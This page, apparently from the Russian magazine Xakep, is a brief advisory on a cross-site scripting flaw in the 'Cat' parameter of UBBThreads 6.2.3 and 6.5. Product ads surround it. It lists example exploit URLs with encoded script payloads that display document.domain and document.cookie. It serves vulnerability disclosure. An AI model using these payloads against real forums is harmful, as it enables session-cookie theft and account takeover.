Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Программа: UBBThreads 6.2.3, 6.5 

Обнаружено межсайтовое выполнение сценариев в UBBThreads. Удаленный атакующий может получить важные данные пользователей.
Уязвимость существует из-за некорректной фильтрации данных в параметре ‘Cat’. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя. 

Примеры:

[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT
%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3C
SCRIPT%3Ealert%28document.cookie%29%3B%3C/SC

[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT
%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3C
SCRIPT%3Ealert%28document.cookie%29%3B%3C/SC

[forum]/login.php?Cat=[XSS(s.a.)]

[forum]/online.php?Cat=[XSS(s.a.)]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии